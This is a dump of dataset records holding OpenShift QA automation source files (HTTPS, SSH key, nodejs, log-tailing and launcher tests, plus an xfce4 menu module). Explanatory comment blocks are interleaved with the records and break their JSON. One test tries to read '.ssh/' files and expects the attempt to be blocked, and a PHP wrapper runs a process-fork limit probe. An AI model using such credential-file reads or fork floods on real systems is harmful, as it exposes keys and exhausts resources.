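assert parse_token_table(sample) == {"AUTH_KEY": "abc"}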
See the GNU\n# Lesser General Public License for more details.\n\n\"\"\"\nTools for working with the xfce4 environment.\n\n\n\"\"\"\n\nimport dtds.xfdesktop_menu\n\nimport POM\n\nclass XFCE4Menu(POM.POMDocument):\n\tDOCTYPE = \"<!DOCTYPE xfdesktop-menu>\\n\"\n\n\tdef emit(self, fo):\n\t\tpp = POM.BeautifulWriter(fo)\n\t\tsuper(XFCE4Menu, self).emit(pp)\n\n\tdef add_submenu(self, **attribs):\n\t\treturn self.root.add_submenu(**attribs)\n\n\tdef add_title(self, **attribs):\n\t\tself.root.add_title(**attribs)\n\n\tdef add_app(self, **attribs):\n\t\tself.root.add_app(**attribs)\n\n\tdef add_separator(self):\n\t\tself.root.add_separator()\n\n\tdef add_include(self, **attribs):\n\t\tself.root.add_include(**attribs)\n\n\t\nclass MenuMixin(object):\n\tdef add_title(self, **attribs):\n\t\ttitle = dtds.xfdesktop_menu.Title(**attribs)\n\t\tself.append(title)\n\t\n\tdef add_app(self, **attribs):\n\t\tapp = dtds.xfdesktop_menu.App(**attribs)\n\t\tself.append(app)\n\n\tdef add_separator(self):\n\t\tself.append(dtds.xfdesktop_menu.Separator())\n\t\n\tdef add_include(self, **attribs):\n\t\tpass\n\n\tdef add_submenu(self, **attribs):\n\t\tMenu = newclass(\"Menu\", MenuMixin, dtds.xfdesktop_menu.Menu)\n\t\tmenu = Menu(**attribs)\n\t\tself.append(menu)\n\t\treturn menu\n\t\n\n\n# factory for menu files\ndef new_menu():\n\tdoc = XFCE4Menu(dtds.xfdesktop_menu)\n\tRootMenu = newclass(\"RootMenu\", MenuMixin, dtds.xfdesktop_menu.Xfdesktop_menu)\n\troot = RootMenu()\n\tdoc.set_root(root)\n\treturn doc\n\ndef open_menu(filename):\n\tfo = file(filename)\n\tdoc = XFCE4Menu(dtds.xfdesktop_menu)\n\tdoc.parseFile(fo)\n\tfo.close()\n\treturn doc\n\n\n" }, { "alpha_fraction": 0.6080992817878723, "alphanum_fraction": 0.618876576423645, "avg_line_length": 33.40449523925781, "blob_id": "77b5585e8554818cbfd8c69da798d3e5adb6c44d", "content_id": "0ea82e0dec6e913edb2f7ffc8d9d02e0f8e04b44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3062, "license_type": "no_license", "max_line_length": 137, "num_lines": 89, "path": "/automation/open/testmodules/RT/cartridge/access_https_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US537][rhc-cartridge] Access an SSL secured version of user's application\nhttps://tcms.engineering.redhat.com/case/122433/\n\"\"\"\nimport os,sys,re\n\nimport testcase,common,OSConf\nimport rhtest\n#import database\n# user defined packages\nimport openshift\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n try:\n self.test_variant = self.config.test_variant\n except:\n print \"WARN: Missing OPENSHIFT_test_name, using php as default.\"\n self.test_variant = 'php'\n self.summary = \"[US537][rhc-cartridge] Access an SSL secured version of user's application\"\n\n self.app_name = \"app\"+self.test_variant\n self.app_type = common.app_types[self.test_variant]\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass AccessHttpsApp(OpenShiftTest):\n def test_method(self):\n # 1. Create an app\n self.steps_list.append(testcase.TestCaseStep(\"1. 
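# new_menu() and add_submenu() above compose classes at runtime with
# newclass(), mixing MenuMixin into a generated DTD element class. newclass()
# comes from the builtin-extension module earlier in this collection; a
# plausible minimal equivalent (an assumption, not the verbatim original) is
# a thin wrapper over type():
def newclass(name, *bases):
    """Build a class named `name` whose bases are taken in the given order."""
    return type(name, bases, {})

class _Mixin(object):
    def hello(self):
        return "hello from %s" % type(self).__name__

class _Base(object):
    pass

Combined = newclass("Combined", _Mixin, _Base)
assert Combined().hello() == "hello from Combined"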
Create an %s app\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Access app using http proto\n self.steps_list.append(testcase.TestCaseStep(\"2.Access app using http proto\",\n common.grep_web_page,\n function_parameters=[self.get_app_url(self.app_name), \"Welcome to OpenShift\", \"-H 'Pragma: no-cache'\", 3, 4],\n expect_description=\"The app is available via http\",\n expect_return=0))\n\n # 3.Access app using http proto\n self.steps_list.append(testcase.TestCaseStep(\"3.Access app using https proto\",\n common.grep_web_page,\n function_parameters=[self.get_app_url(self.app_name, \"https\"), \"Welcome to OpenShift\", \"-k -H 'Pragma: no-cache'\", 3, 4],\n expect_description=\"The app is available via https\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n case.add_clean_up(\"rm -rf %s\"%(self.app_name))\n\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def get_app_url(self, app_name, proto=\"http\"):\n def get_app_url2(): \n return proto+\"://\"+OSConf.get_app_url(self.app_name)\n return get_app_url2\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AccessHttpsApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5451678037643433, "alphanum_fraction": 0.5604866147041321, "avg_line_length": 41.266666412353516, "blob_id": "3d72ec48057b93f048486decdfed367c50ebe9bb", "content_id": "8ba6f3c7846f4d92122b072266be6980b806a593", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4439, "license_type": "no_license", "max_line_length": 158, "num_lines": 105, "path": "/automation/open/testmodules/RT/client/add_remove_mult_ssh_keys.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#\n# File name: add_remove_mult_ssh_keys.py\n# Date: 2012/03/20 10:52\n# Author: [email protected]\n#\n\nimport os\n\nimport testcase, common\nimport rhtest\n# user defined packages\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.key_name1 = common.getRandomString(10)\n self.key_name2 = common.getRandomString(10)\n self.key_file_name1 = common.getRandomString(10)\n self.key_file_name2 = common.getRandomString(10)\n tcms_testcase_id = 141794\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -f %s\"%self.key_file_name1)\n os.system(\"rm -f %s\"%self.key_file_name2)\n common.remove_sshkey(self.key_name1)\n common.remove_sshkey(self.key_name2)\n\n\nclass AddRemoveMultSshKeys(OpenShiftTest): \n def test_method(self):\n status1 = common.command_get_status(\"ssh-keygen -t rsa -N '' -f %s\" % self.key_file_name1)\n status2 = common.command_get_status(\"ssh-keygen -t rsa -N '' -f %s\" % self.key_file_name2)\n \n if status1 != 0 or status2 != 0:\n return 
self.failed(\"Unable to create a ssh key\")\n\n self.steps_list.append(testcase.TestCaseStep(\"Add created key as %s\"%self.key_name1,\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % (self.key_file_name1), self.key_name1, self.user_email, self.user_passwd],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Add created key as %s\"%self.key_name2,\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % (self.key_file_name2), self.key_name2, self.user_email, self.user_passwd],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Remove the first one\" ,\n common.remove_sshkey,\n function_parameters=[self.key_name2, self.user_email, self.user_passwd],\n expect_return=0,\n expect_description=\"Should remove only one the %s not the %s (despite they are the same)\"%(self.key_name2, self.key_name1)))\n\n self.steps_list.append(testcase.TestCaseStep(\"Check the %s\"%self.key_name1,\n \"rhc sshkey list -l %s -p '%s' %s\"%(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_string_list=[\"%s\"%self.key_name1],\n unexpect_string_list=[\"%s\"%self.key_name2],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Remove the second one\",\n common.remove_sshkey,\n function_parameters=[self.key_name1, self.user_email, self.user_passwd],\n expect_return=0,\n expect_description=\"Should remove the %s\"%self.key_name1))\n\n self.steps_list.append(testcase.TestCaseStep(\"Check both keys - %s/%s\"%(self.key_name1, self.key_name2),\n \"rhc sshkey list -l %s -p '%s' %s\"%(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n unexpect_string_list=[\"%s\"%self.key_name1, \"%s\"%self.key_name2],\n expect_return=0))\n\n case = testcase.TestCase(\"Add/remove multi ssh keys with same value and different names\",\n self.steps_list)\n\n case.run()\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n \n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AddRemoveMultSshKeys)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n \n\n#\n# end of add_remove_mult_ssh_keys.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5772171020507812, "alphanum_fraction": 0.583588182926178, "avg_line_length": 31.42148780822754, "blob_id": "d2312a6ec4b93f195016011e284e125dd7e393f1", "content_id": "320f8716fbea2bac5097e244798089edea77264c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3924, "license_type": "no_license", "max_line_length": 159, "num_lines": 121, "path": "/automation/open/testmodules/RT/cartridge/nodejs_framework_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nFeb 14, 2012\n\n[US590][Runtime][rhc-cartridge]nodejs framework support\nhttps://tcms.engineering.redhat.com/case/136576/\n\"\"\"\n\nimport os\nimport sys\nimport shutil\nimport re\nimport fileinput\n\nimport testcase\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US590][Runtime][rhc-cartridge]nodejs framework support\"\n self.app_type = 'nodejs'\n self.app_name = 'my%s%s' % ( self.app_type, common.getRandomString() )\n self.git_repo = './' + 
self.app_name\n self.steps_list = []\n self.random_string = common.getRandomString()\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass NodeJsFrameworkSupport(OpenShiftTest):\n\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n 'Creating the application',\n common.create_app,\n function_parameters = [ self.app_name, common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, ],\n expect_description = 'The app should be created successfully',\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n 'Checking welcome screen',\n common.check_web_page_output,\n function_parameters = [ self.app_name ],\n expect_description = 'The index page must be OpenShift branded',\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n 'Configuring the application',\n self.configuring_nodejs_app,\n function_parameters = [ self.git_repo, self.random_string ],\n expect_description = \"Condiguration of our NodeJS should be successfull\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n 'Checking NodeJS web-page output',\n common.check_web_page_output,\n function_parameters = [ self.app_name, '', self.random_string ],\n expect_description = 'In output we have to find our random string',\n expect_return = 0))\n \n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def configuring_nodejs_app(self, git_repo, random_string):\n\n try:\n file_name = git_repo + \"/server.js\"\n for line in fileinput.input(file_name, inplace = True):\n match = re.search(r\"res.send\\(self.cache_get\\('index.html.*\", line)\n if match:\n print 'res.send(\"<html><head></head><body><p>%s</p></body></html>\");' % ( random_string )\n else:\n print line,\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n return 1\n finally:\n fileinput.close()\n\n deployment_steps = [\n \"cd %s\" % ( git_repo ),\n \"git commit -a -m 'Added special handler for /'\",\n \"git push\" ]\n\n ( ret_code, ret_output ) = common.command_getstatusoutput(\" && \".join(deployment_steps))\n print ret_output\n return ret_code\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NodeJsFrameworkSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5755555629730225, "alphanum_fraction": 0.5788888931274414, "avg_line_length": 18.565217971801758, "blob_id": "adc74115bd25a16621093dbe42931cfd94ea1330", "content_id": "18c6a84b1ae3cd58f38a901c849e45063acf9363", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1800, "license_type": "no_license", "max_line_length": 70, "num_lines": 92, "path": "/automation/open/testmodules/RT/limits/app_template/nproc.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\n#\n# Run multifork.py\n#\n# actions:\n# start - run as a daemon\n# stop - stop daemon \n# status - query daemon status\n# clean - remove logs and any leftover processes\n# onetime - run once without forking\n#\n# \n# parameters:\n# 
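# configuring_nodejs_app() above rewrites server.js with
# fileinput.input(..., inplace=True), where whatever the loop writes to stdout
# becomes the new file content line by line. The pattern on its own (the file
# name and regex in the usage comment are illustrative only):
import fileinput
import re
import sys

def replace_matching_lines(path, pattern, replacement):
    """Swap every line matching pattern for replacement, editing in place."""
    for line in fileinput.input(path, inplace=True):
        if re.search(pattern, line):
            sys.stdout.write(replacement + "\n")
        else:
            sys.stdout.write(line)
    fileinput.close()

# replace_matching_lines("server.js", r"res\.send\(self\.cache_get", "res.send('hi');")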
daemon - fork\n# logfile - where to write logs\n# pidfile - where to write the PID for controls\n# format - the output format of the logs\n# duration - how long to run\n# count - the number of processes to try to start\n\n$scriptfile = \"python multifork.py\";\n\n$defaults = \n array(\n\t'debug' => FALSE,\n\t'verbose' => FALSE,\n\t'noop' => FALSE,\n\t'help' => FALSE,\n\t'daemon' => FALSE,\n\t'logfile' => NULL,\n\t'pidfile' => NULL,\n\t'format' => NULL,\n\t'duration' => NULL,\n\t'count' => NULL\n\t);\n\n$formats = array('text', 'html', 'xml', 'json');\n\n$shortopts = \"dvnhl:p:f:D:c:\";\n\n$longopts = \n array(\n\t\"debug\",\n\t\"verbose\",\n\t\"dryrun\",\n\t\"help\",\n\t\"daemon\",\n\t\"logfile:\",\n\t\"pidfile:\",\n\t\"format:\",\n\t\"duration:\",\n\t\"count:\"\n\t);\n\n$optmap = array(\n\t\t\"d\" => \"debug\",\n\t\t\"v\" => \"verbose\",\n\t\t\"n\" => \"dryrun\",\n\t\t\"h\" => \"help\",\n\t\t\"l\" => \"logfile\",\n\t\t\"p\" => \"pidfile\",\n\t\t\"f\" => \"format\",\n\t\t\"D\" => \"duration\",\n\t\t\"c\" => \"count\"\n\t\t);\n\nif (isset($_SERVER['argc'])) {\n #\n # Only collect options from CLI if called that way\n #\n $opt = getopt($shortopts, $longopts);\n\n # map the short to long and remove them.\n $shortkeys = array_keys($optmap);\n foreach ($opt as $optkey => $optvalue) {\n if (array_key_exists($optkey, $optmap)) {\n $longkey = $optmap[$optkey];\n if (! array_key_exists($longkey, array_keys($opt))) {\n\t$opt[$longkey] = $optvalue;\n }\n unset($opt[$optkey]);\n }\n }\n} else {\n # Collect options from server GET/POST\n $dummy = 0;\n}\n\nexec(\"$scriptfile --format text --duration 10 --count 300\" , $output);\n$result = join(\"\\n\", $output);\nprint $result;\n?>\n" }, { "alpha_fraction": 0.5400837063789368, "alphanum_fraction": 0.5482936501502991, "avg_line_length": 33.89887619018555, "blob_id": "3e156367752c1a75e5660c961f7d144a4c411bcc", "content_id": "dbd52e091e09e7a8e0edb1efeb78a4fb3b6a79b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6212, "license_type": "no_license", "max_line_length": 128, "num_lines": 178, "path": "/automation/open/testmodules/RT/client/rhc_tail_files_check.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport common, OSConf\nimport rhtest\nimport time\nimport os\n# user defined packages\nimport proc\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.exp_file = \"rhc-tail-files-%s.expect\"%common.getRandomString(5)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(10)\n self.text_to_verify = 'Jn316'\n try:\n self.app_type = self.get_variant()\n except:\n self.app_type = 'ruby'\n tcms_testcase_id=122302\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -f %s\"%self.exp_file)\n try:\n self.rhc_tail_proc.kill()\n return\n common.destroy_app(self.app_name)\n common.command_get_status(\"rm -rf %s\"%self.app_name)\n except:\n pass\n\n\nclass RhcTailFilesCheck(OpenShiftTest):\n\n def run_rhc_tail(self, arguments=''):\n url = OSConf.get_app_url(self.app_name)\n for i in range(1): #touch that app\n common.grep_web_page(url,'OpenShift')\n\n # Get the path of rhc\n (status, output) = common.command_getstatusoutput('which rhc')\n if status != 0:\n return self.failed(\"Unable to find rhc client\")\n\n fw = open(self.exp_file, \"wb\")\n 
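# multifork.py itself is not reproduced in this record; its flags above
# (--count, --duration) describe a process-limit probe: start up to `count`
# children and see how many the account's limits actually allow. A toy sketch
# of that idea for POSIX systems, assuming nothing about the real script
# beyond those flags:
import os
import sys
import time

def multifork_probe(count, duration):
    started = []
    for _ in range(count):
        try:
            pid = os.fork()
        except OSError:
            break  # fork refused, e.g. RLIMIT_NPROC reached
        if pid == 0:
            time.sleep(duration)  # child just idles through the test window
            os._exit(0)
        started.append(pid)
    for pid in started:
        os.waitpid(pid, 0)  # reap every child before reporting
    return len(started)

if __name__ == "__main__":
    sys.stdout.write("started %d processes\n" % multifork_probe(10, 1))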
fw.write(\"\"\"spawn -nottyinit %s tail %s -l %s -p %s %s %s\nset timeout -1\nexpect wait_for_ever_and_ever\n \"\"\"%(output.strip(), self.app_name, self.user_email, self.user_passwd, arguments, common.RHTEST_RHC_CLIENT_OPTIONS))\n fw.close()\n \n cmd=[\"/usr/bin/expect\", self.exp_file] \n\n try:\n self.rhc_tail_proc.wait(1)\n self.rhc_tail_proc.kill()\n except:\n pass\n\n try:\n #stdin as /dev/null is very impotant thing if we run SSH remotely, \n #which is also this case\n self.rhc_tail_proc = proc.Proc(cmd, \n shell=False, \n stdin=open(os.devnull, 'rb'))\n except Exception as e:\n self.error(str(e))\n return False\n\n return True\n\n def do_changes(self):\n uuid= OSConf.get_app_uuid(self.app_name)\n try:\n for i in range(5):\n cmd = \"echo %s>> /var/lib/openshift/%s/%s/logs/error_log-*\"%(self.text_to_verify, uuid, self.app_type)\n (status1, output) = common.run_remote_cmd(self.app_name, cmd)\n cmd = \"echo %s>> /var/lib/openshift/%s/%s/logs/access_log-*\"%(self.text_to_verify, uuid, self.app_type)\n (status2, output) = common.run_remote_cmd(self.app_name, cmd)\n except Exception as e:\n self.error(str(e))\n return 1\n\n return status1+status2\n\n def verify(self):\n url = OSConf.get_app_url(self.app_name)\n for i in range(1): #touch that app\n common.grep_web_page(url, 'OpenShift')\n\n return self.rhc_tail_proc.grep_output(self.text_to_verify, 3, 10)\n\n\n def test_method(self):\n\n rhtest.TestStep(self, \"1. Let's have an %s app\"%self.app_type,\n common.create_app,\n function_parameters=[self.app_name, \n common.app_types[self.app_type], \n self.user_email, \n self.user_passwd, \n False],\n expect_description=\"App should be created\",\n expect_return=0)()\n\n rhtest.TestStep(self, \"2. Run rhc-tail-files to monitor into background\",\n self.run_rhc_tail,\n expect_description=\"Monitor rhc-tail-files should be run without errors\",\n expect_return=True)()\n\n rhtest.TestStep(self, \"3.Append some data to log files directly.\",\n self.do_changes,\n expect_description=\"Data should be appended to the remote log files\",\n expect_return=0)()\n\n rhtest.TestStep(self, \"4. Verify output of 'rhc tail'\", \n self.verify,\n expect_description=\"Searched string should be found via web output\",\n expect_return=0)()\n\n rhtest.TestStep(self, \"5. Append some data to log files directly.\",\n self.do_changes,\n expect_description=\"Data should be appended to the remote log files\",\n expect_return=0)()\n\n rhtest.TestStep(self, \"6. Check direct call\",\n self.run_rhc_tail,\n function_parameters = [\"--file %s/logs/access_log-%s-000000-*\"%(self.app_type, \n time.strftime(\"%Y%m%d\",time.localtime()))],\n expect_description = \"Direct parameter should work\",\n expect_return=True)()\n\n if self.rhc_tail_proc.grep_output(\"HTTP\", 3, 10)!=0:\n return self.failed(\"Unable to launch't rhc-tail-files --files\")\n\n '''\n step = rhtest.TestStep(self, \"Check --file *\", \n self.run_rhc_tail,\n function_parameters=[self.app_name, '--file \"*\"'],\n expect_return=1)\n (status, output) = step()\n if (rhc_tail.poll()==None):\n rhc_tail.send_signal(signal.SIGINT)\n rhc_tail.terminate()\n\n '''\n rhtest.TestStep(self, \"7. 
Check --file .ssh/\",\n self.run_rhc_tail,\n function_parameters = [\"--file .ssh/\"],\n expect_description=\"We shouldn't be allowed\",\n expect_return=True)()\n\n if not self.rhc_tail_proc.grep_output(\"Could not find any files matching glob\",3,10):\n return self.failed(\"rhc-tail-files could read .ssh/ files\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcTailFilesCheck)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5711519122123718, "alphanum_fraction": 0.5844759345054626, "avg_line_length": 38.35670852661133, "blob_id": "639b8e63028d6c110fe7fbf98594d1c026b81d56", "content_id": "5a6f0f9450330fa0d91316c0beac5e36f82472bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12909, "license_type": "no_license", "max_line_length": 263, "num_lines": 328, "path": "/open_automation/bin/plauncher.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport sys\nimport time\nfile_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = os.path.abspath(file_path + \"/../lib\")\ntestmodules_path = os.path.abspath(file_path + \"/../testmodules\")\nsys.path.append(lib_path)\nsys.path.append(testmodules_path)\nfrom tcms import TCMS\nimport common\nimport Queue\n\nq = Queue.Queue()\nq2 = Queue.Queue()\n\nCOUNTER=0\nPARALLEL_MODE=False\n\ntcmsobj = None\n\n \ndef run_tests(testrun_id, tc_id_list=None):\n testrun_cases = tcmsobj.get_testcase_from_run(testrun_id)\n final_testrun_cases = []\n\n print \"Filtering Test Case ...\"\n for i in testrun_cases:\n testcaserun = tcmsobj.get_testcaserun(i['case_id'],testrun_id)\n i['testcaserun_id'] = testcaserun['case_run_id']\n #print \"-\"*5\n #print i\n #print testcaserun\n #print \"-\"*5\n if i['case_status'] != 'CONFIRMED' or i['is_automated'] != 1 or testcaserun['case_run_status'] != 'IDLE': \n print \"Case %s in this test run is not confirmed, or automated, or its status is not idled, skipping it\" %(i['case_id'])\n else:\n if tc_id_list != None and i['case_id'] not in tc_id_list:\n #print type(i['case_id'])\n print \"Case %s in not in your specified list - %s, skipping it\" %(i['case_id'], tc_id_list)\n else:\n final_testrun_cases.append(i)\n\n if len(final_testrun_cases) == 0:\n print \"No suitable test for testing !!!\"\n return\n\n # First of all, will run 142463 case\n #print \"=\" * 20\n #print \"Job starts - Creating domain\"\n #print \"=\" * 20\n queue_cmd(\"RT.job_related.create_domain\")\n\n for tc in final_testrun_cases:\n print \"-\" * 10\n print \"Enqueining test case - %s\" %(tc['case_id'])\n print \"-\" * 10\n #print tc\n #print \"-\" * 5\n script = tc['script'].split(\".py\")[0]\n #print \"----->\", script\n cf_path = \"%s/%s.%s\" %(testmodules_path, script + \".conf\", os.environ['OPENSHIFT_user_email'])\n #print \"----->\", cf_path\n module_name = \".\".join(script.split(\"/\"))\n if tc['arguments'] == '':\n tc['arguments'] = None\n content = \"\"\"\ntcms_arguments = %s\nscript = '%s'\ntcms_testcase_id = %s\ntcms_testrun_id = %s\ntcms_testcaserun_id = %s\n\"\"\" %(tc['arguments'], tc['script'], tc['case_id'], testrun_id, tc['testcaserun_id'])\n\n # Before running, check status again, set it for RUNNING status, also for parallel funcationaliy\n case_run = tcmsobj.get_testcaserun_by_id(tc['testcaserun_id'])\n if 
case_run['case_run_status'] == 'IDLE':\n            #tcmsobj.update_testcaserun_status(tc['testcaserun_id'], 'RUNNING')\n            common.write_file(cf_path, content)\n            queue_cmd(module_name, {'testcaserun_id' : tc['testcaserun_id']})\n        else:\n            print \"Testcaserun - %s status is not IDLE now, skipping it.\" %(tc['testcaserun_id'])\n\n    # In the end, will run 146352\n    print \"=\" * 20\n    print \"Job ends - Cleaning domain and app\"\n    print \"=\" * 20\n    queue_cmd(\"RT.job_related.apps_clean_up\")\n    queue_cmd(\"RT.job_related.apps_clean_up\") #we need this also for the second thread\n    #\n    # Let's run the queues\n    #\n    if PARALLEL_MODE == True:\n        #we have to put the last to other queue for cleaning...\n        run_queues_in_parallel()\n    else:\n        run_queues_in_sequence()\n\n    # Update the test run status to FINISHED \n    tcmsobj.update_testrun(testrun_id, {'status' : 1})\n\n\ndef create_test_run(testrun_tag, tc_id_list):\n    \"\"\"\n    Create TCMS.TestRun according to tc_id_list or tc_tag_list.\n    \"\"\"\n    timestamp = time.strftime(\"%Y_%m_%d-%H:%M:%S\", time.localtime())\n    test_run_summary = \"Openshift-%s-%s\" %(testrun_tag, timestamp)\n    testrun_id = tcmsobj.create_testrun(test_run_summary)['run_id']\n    # create_domain - 142463; clean_up - 146352\n    # These two cases must be added into the new test run as the first one and the last one.\n    #update_test_run(testrun_id, [142463])\n    update_test_run(testrun_id, tc_id_list) \n    #update_test_run(testrun_id, [146352])\n    return testrun_id\n    \n\n\ndef update_test_run(testrun_id, tc_id_list):\n    \"\"\"\n    Update TCMS.TestRun according to tc_id_list.\n    \"\"\"\n    if tc_id_list != None and isinstance(tc_id_list, list) and len(tc_id_list) != 0:\n        tcmsobj.add_testcase_to_run(tc_id_list, testrun_id)\n        return True\n    else:\n        print \"only support list format for test cases\"\n        return False\n    \n    \n    \ndef get_email(id=None):\n    if id is None:\n        return os.getenv(\"OPENSHIFT_user_email\")\n\n    if not os.environ.has_key(\"OPENSHIFT_user_email2\"):\n        print \"WARN: Missing OPENSHIFT_user_email2, using generated one instead.\"\n        return os.getenv(\"OPENSHIFT_user_email\").replace('@','%s@'%str(id))\n    else:\n        return os.getenv(\"OPENSHIFT_user_email2\")\n\ndef main():\n    global tcmsobj\n    global PARALLEL_MODE\n\n    usage = \"\"\"\nusage: %s {Instance Arguments} {TCMS Arguments}\nInstance Arguments: (-a ec2-xxx.compute-1.amazonaws.com) | ([-m devenv_xxx] [-n QE_devenv_xxx] [-z xxx])\nTCMS Arguments: (-t xxx (-c 'n, ..., m')|(-g 'xxx, ..., zzz') [-p xxx]) | (-i xxx [(-c 'n, ..., m')|(-g 'xxx, ..., zzz') -p xxx])\n\"\"\" %(os.path.basename(__file__))\n\n    from optparse import OptionParser\n    parser = OptionParser(usage=usage)\n    parser.add_option(\"-m\", \"--ami\", dest=\"ami\", help=\"Instance Arguments: Launch openshift instance from this ami.\")\n    parser.add_option(\"-n\", \"--instance_tag\", dest=\"instance_tag\", help=\"Instance Arguments: Instance tag for the newly launched instance\")\n    parser.add_option(\"-a\", \"--instance_ip\", dest=\"instance_ip\", help=\"Instance Arguments: Using this existing openshift instance for testing\")\n    parser.add_option(\"-z\", \"--image_size\", dest=\"image_size\", default='m1.medium', help=\"Instance Arguments: Specify size for launching instance. 
By default it is m1.medium\")\n    parser.add_option(\"-t\", \"--testrun_tag\", dest=\"testrun_tag\", help=\"TCMS Arguments: Create new test run with this tag\")\n    parser.add_option(\"-i\", \"--testrun_id\", dest=\"testrun_id\", type=int, help=\"TCMS Arguments: Using this existing test run that you want to run.\")\n    parser.add_option(\"-c\", \"--testcase_ids\", dest=\"testcase_ids\", help=\"TCMS Arguments: A list of test case ids that you want to execute\")\n    parser.add_option(\"-g\", \"--testcase_tags\", dest=\"testcase_tags\", help=\"TCMS Arguments: A list of test case tags that you want to execute\")\n    parser.add_option(\"-p\", \"--testplan_id\", dest=\"testplan_id\", default=4962, type=int, help=\"TCMS Arguments: All test cases are selected from this test plan for creating/updating test run. By default it is 4962 - https://tcms.engineering.redhat.com/plan/4962/\")\n    parser.add_option(\"-P\", \"--parallel\", dest=\"parallel\", action=\"store_true\", help=\"Run in parallel mode. (by two different users)\")\n\n    (options, args) = parser.parse_args()\n    #print \"-->\", options\n    #print \"-->\", args\n\n    # Priority for Instance Arguments: -a -> -m\n    if options.instance_ip != None: \n        # This branch is when you want to use existing instance\n        instance_ip = options.instance_ip\n    elif options.ami != None:\n        # This is when you want to launch new instance\n        